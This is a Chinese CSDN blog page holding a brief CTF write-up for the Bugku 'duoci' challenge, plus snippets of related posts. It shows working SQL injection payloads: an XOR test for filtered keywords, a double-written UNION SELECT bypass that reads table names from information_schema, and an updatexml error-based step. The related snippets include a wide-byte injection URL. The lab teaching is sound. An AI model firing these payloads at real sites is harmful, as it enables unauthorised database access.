bugku-多次（详细）

最新推荐文章于 2025-06-29 21:50:15 发布

偷一个月亮

最新推荐文章于 2025-06-29 21:50:15 发布

阅读量1.9k

点赞数

CC 4.0 BY-SA版权

分类专栏： PHP CTF SQL注入文章标签： ctf php sql

本文为博主原创文章，未经博主允许不得转载，否则追究法律责任。

本文链接：https://blog.youkuaiyun.com/yiqiushi4748/article/details/93038201

CTF 同时被 3 个专栏收录

44 篇文章

订阅专栏

PHP

36 篇文章

订阅专栏

SQL注入

7 篇文章

订阅专栏

博客主要围绕CTF中的考点展开，涉及PHP和SQL相关知识。包含异或注入判断过滤关键字，可通过双写绕过过滤，获取表名、列名及下一关入口；还介绍了updatexml报错注入，用于获取表名、列名和cat flag。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

在这里插入图片描述

第一个考点：异或注入判断过滤关键字

在这里插入图片描述
?id=1’^(length(‘union’)!=0)–+

过滤的用双写绕过

GET /1ndex.php?id=-1' ununionion selselectect 2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x776562313030322d31 --+

表名
在这里插入图片描述
列名

在这里插入图片描述
得到下一关入口

第二个考点：updatexml报错注入

在这里插入图片描述
表名

列名

cat flag
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

偷一个月亮

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Bugku -分析-合集

多崎巡礼的博客

11-19

1万+

一、flag被盗 http筛选选中一个post包，追踪tcp数据流得到flag

二、Bugku-----这么多数据包找找吧，先找到getshell的流------流量分析题------TCP

qwsn

10-14

2522

一、题目： **题目网盘链接：**https://pan.baidu.com/s/1M5mi9nvkj7v-DA2w1qOt0g 提取码：vn78 二、解题步骤： 1.使用wireshark打开CTF.pcapng 2.打开后开始分析代码 ①首先看到，2到4和7到8为ARP广播请求包，8为ARP单播应答包 src.ip:192.168.116.161 dst.ip:192.168.116....

参与评论您还未登录，请先登录后发表或查看评论

BugKu-多次

苟有恒，必有三更眠，五更起。

08-06

709

多次原题链接 http://120.24.86.145:9004 分析单引号出错加上%23，发现不出错了加上' and 1=1%23 又出错了，应该是过滤了这里学习到一个新知识，如何判断过滤了哪些字符？采用异或注入。在id=1后面输入 '(0)' 发现不出错，那就将0换成1=1 如果出错，那就是成功了如果括号里面的判断是假的，那么...

Bugku 多次

Superpig的博客

11-19

482

步骤 1、打开题目链接，发现url传入了参数id=1,当改参数为id=1’ 时显示有错误，改为id=1&quot;时没有错误，因此，判断是错误注入 2、首先判断什么情况下会报错，方法：异或注入 id=1’^(0)%23 时，正常运行（%23是#的url编码） id=1’^(1)%23 时，报错因此，判断出，当括号里的表达式为真时报错 3、判断过滤了哪些字符 id=1’(length(‘union’)...

Bugku——WEB篇（持续更新ing）

最新发布

qq_52854348的博客

06-29

674

BUGKU-WEB 滑稽计算器 alert 你必须让他停下头等舱 GET POST source 矛盾备份是个好习惯

bugku 多次

小白渣的博客

09-14

220

加粗样式这题分为两个关卡，都是sql注入的。第一关是关键字and、or、union、select过滤，第二关是报错注入。分析单引号出错加上%23，发现不出错了加上' and 1=1%23 又出错了，应该是过滤了采用异或判断（即相同的条件即为假）采用异或注入。在id=1后面输入 '(0)' 发现不出错，那就将0换成1=1 如果出错，那就是成功了如果括号里面的判断是假的，那么页面...

Bugku_多次

weixin_43749601的博客

10-24

424

打开题目，发现页面上啥也没有，但是URl地址栏里有id的参数传进去，将id=1 换成id=2，页面信息发生变化，立马就想到了可能存在SQL注入。测试闭合方式 id=1' //报错 id=1" //不报错此时确定闭合方式为单引号闭合接着可以利用异或方式测试一下是否有对一些SQL注入的关键字有过滤。例如^(length(‘or’)!=0)如果返回页面显示正常，那就证明length(‘or’)==0的，也就是or被过滤了，通过测试发现，select or and union被过滤了，但是我们可以.

爬虫笔记-Bugku秋名山老司机（入门）

12-21

多刷新几次可见题目提示，需要用post传入值，变量名为value 创建py文件，导入 requests 库和 re 库并且创建一个会话对象，用它发送一个get请求 # requests库用于发送请求 # re库用于匹配正则表达式 import ...

bugku-pwn-wp

令则

03-27

544

bugku 文章目录bugkupwn1pwn2pwn3pwn4pwn5 pwn1 这个是典型的新手题了，nc连上去就有shell，　直接可以拿到flag。 pwn2 main函数这里我们看到read函数位置会出现一个典型的栈溢出。然后我们计算下溢出位置到返回值之间的距离，就可以控制程序流程了，接下来我们看到函数中存在一个get_shell_函数：然后就可以着手写exp，这里简单写下pa...

bugku-web-变量1

qq_51775369的博客

10-30

2836

打开题目，看到一串PHP代码，分析。 error_reporting(0);//关闭PHP错误显示； include "flag1.php";// 引入flag1.php文件代码 highlight_file(__file__);//对文件进行语法高亮显示 if(isset($_GET['args'])){//判断url直接定义的args是否存在 $args = $_GET['args'];//将GET赋值的args赋值给变量$args if(!preg_match("...

bugku web writeup（持续更新）

youshangfashi的博客

10-04

390

web2 打开以后就长这样，眼睛差点瞎掉不用想先F12一下先看到阴影部分了没，对就是它。 ============================================================================================== 计算器打开以后就长这样先F12一下 ...

bugku /.-

PRCORANGE的博客

04-11

556

题目： …-./.-…/.-/–./----.–/-…/…–/…-./-.-./-…/…-./.----/–…/…-./----./…–/----./----./…/-----/…-/-----.- 摩斯密码最后大写变成小写，加上括号

BUGKU /.-

m0_52920608的博客

01-31

778

1.题目描述： …-./.-…/.-/–./----.–/-…/…–/…-./-.-./-…/…-./.----/–…/…-./----./…–/----./----./…/-----/…-/-----.- 2.联想到摩斯密码，于是复制粘贴到https://www.atool99.com/morse.php进行解密得到：将大写全部改为小写，，%u7d改为{和}得到正确flag ...

【Crypto】BUGKU- /.-

Scau_MShanLeung的博客

08-15

267

【Crypto】BUGKU- /.-题目描述解题思路&&考察内容在线工具1.摩斯密码解密工具：总结个人学习记录，如有不妥，欢迎指正题目描述解题思路&&考察内容解题思路： 1.符合摩斯密码的特征（仅有. - ）。 2.摩尔密码加密的字符只有字符，数字，标点，不区分大小写考察：摩斯密码在线工具 1.摩斯密码解密工具： https://www.atool99.com/morse.php 【互联网上唯一能对中文摩斯密码加解密的工具】（推荐收藏！！）：

bugku中的多次题目以及学到的异或注入

mylyylmy的博客

08-01

3308

首先我们判断一下是什么注入类型注意输入的是英文字符'，中文不会转变为%27，报错，说明是字符注入这时候我们就要判断一下SQL网站过滤了什么内容，我们可以使用异或注入来判断哪些字符串被过滤掉了 http://120.24.86.145:9004/1ndex.php?id=1%27^(0)%23 正常运行，我们在输入 http://120.24.86.145:9004/1nde...

Bugku web——多次

qq_40481505的博客

10-15

308

打开链接首先对id尝试注入单引号和双引号，发现都报错继续测试，发现下面结果： ?id=1' --+ （显示成功） ?id=1" --+ （显示成功） ?id=1' and 1=1 --+ （显示报错） ?id=1" and 1=1 --+ （显示成功）猜测sql语句使用的是单引号，且对and继续过滤使用下面代码验证 ?id=1'^(length('and')!=0)^' （显示成功...

bugku writeup web

quedgee

10-27

644

先可以通过burp来发现是gbk编码，可以得知可能存在宽字节注入既然有提示，那么就按照提示来查询key表,id=1的string字段构造payloadhttp://103.238.227.13:10083/?id=1%df%27 union select 1,string from sql5.key%23得到flag~~~~有趣的是http://103.238.227.13:10083/?i

bugku misc writeup（部分）

youshangfashi的博客

09-20

4899

1、这是一张单纯的图片？？？本题给出一张图片，用notepad++打开，然后就能看到最后一行有一些规律的数字（key{you are right}）猜测是ASCII，然后翻译出来（key{you are right

bugku chatgpt-1

10-09

ChatGPT是一种由OpenAI训练的大型语言模型。它的原理是基于Transformer架构，通过预训练大量文本数据来学习如何生成人类可读的文本，然后通过接受输入并生成输出来实现对话。 ChatGPT的用途非常广泛，可以用于自然...

bugku-多次 （详细）

bugku-多次（详细）